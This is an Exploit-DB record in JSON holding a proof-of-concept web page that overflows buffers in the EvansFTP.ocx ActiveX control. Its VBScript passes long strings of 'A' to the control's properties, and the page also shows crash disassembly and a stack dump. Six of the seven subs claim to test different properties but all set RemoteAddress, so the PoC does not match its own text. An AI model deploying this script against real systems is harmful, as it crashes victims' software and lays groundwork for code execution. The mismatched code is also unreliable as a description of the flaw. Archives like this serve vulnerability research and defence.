{"id": "EDB-ID:7460", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)", "description": "", "published": "2008-12-14T00:00:00", "modified": "2008-12-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/7460", "reporter": "Bl@ckbe@rD", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T07:03:41", "viewCount": 14, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://www.exploit-db.com/download/7460", "sourceData": "<HTML>\r\n<package><job id='DoneInVBS' debug='false' error='true'>\r\n<object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' />\r\n<HEAD>\r\n <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE>\r\n</HEAD>\r\n<BODY>\r\n[+] Application : EvansFTP ActiveX <br>\r\n[+] CompanyName : Evans Programming <br>\r\n[+] Description : Multi-threaded asynchronus Active-X FTP Control<br>\r\n[+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br>\r\n[+] Exploit : Remote BoF (PoC)<br>\r\n[+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br>\r\n[+] Object Safety Report :<br>\r\nReport for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br>\r\nRegKey Safe for Script: Faux<br>\r\nRegKey Safe for Init: Faux<br>\r\nImplements IObjectSafety: Vrai<br>\r\nIDisp Safe: Safe for untrusted: caller,data <br>\r\nIPStorage Safe: Safe for untrusted: caller,data <br><br>\r\nRegKey Safe for Script: Faux<br>\r\nRegkeySafe for Init: Faux<br>\r\nKillBitSet: Faux<br>\r\n<br><br>\r\nThe Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br>\r\n1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br>\r\n2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br>\r\n3- ProxyName suffers from a BoF when we pass a string over 1044 <br>\r\n4- Password suffers from a BoF when we pass a string over 1044 <br>\r\n5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br>\r\n6- LoginName suffers from a BoF when we pass a string over 1044 <br>\r\n7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br>\r\nDisASM RemoteAddress Crash :<br><pre>\r\n7C809EEC MOV AL,[EDX] (KERNEL32.dll)\r\n \r\n7C809ED4 TEST EDX,EDX\r\n7C809ED6 JE 7C80C858\r\n7C809EDC LEA EDI,[EDX+EAX-1]\r\n7C809EE0 CMP EDI,EDX\r\n7C809EE2 JB 7C80C858\r\n7C809EE8 AND DWORD PTR [EBP-4],0\r\n7C809EEC MOV AL,[EDX] <--- CRASH\r\n \r\nEBP+8 FEEEFEEE\r\nStack Dump:\r\n13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00\r\n \r\n</pre>\r\n<script language='vbscript'>\r\nSub RemoteAddress\r\narg1=String(2068, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyPrefix\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyName\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub Password\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub ProxyBypassList\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub LoginName\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n \r\nSub CurrentDirectory\r\narg1=String(1044, \"A\")\r\nbeard.RemoteAddress = arg1\r\nEnd Sub\r\n</script><br><br>\r\n \r\n<INPUT TYPE=\"button\" VALUE=\"RemoteAddress PoC\" ONCLICK=RemoteAddress()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyPrefix PoC\" ONCLICK=ProxyPrefix()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyName PoC\" ONCLICK=ProxyName()>\r\n<INPUT TYPE=\"button\" VALUE=\"Password PoC\" ONCLICK=Password()>\r\n<INPUT TYPE=\"button\" VALUE=\"ProxyBypassList PoC\" ONCLICK=ProxyBypassList()>\r\n<INPUT TYPE=\"button\" VALUE=\"LoginName PoC\" ONCLICK=LoginName()>\r\n<INPUT TYPE=\"button\" VALUE=\"CurrentDirectory PoC\" ONCLICK=CurrentDirectory()><br><br>\r\nBrought to You by Bl@ckbe@rD<br>\r\nPeace xD\r\n </BODY>\r\n</HTML>\r\n\r\n# milw0rm.com [2008-12-14]", "osvdbidlist": ["57365"], "exploitType": "dos", "verified": true, "_state": {"dependencies": 1645222215}}
{}
EvansFTP - 'EvansFTP.ocx' Remote Buffer Overflow (PoC)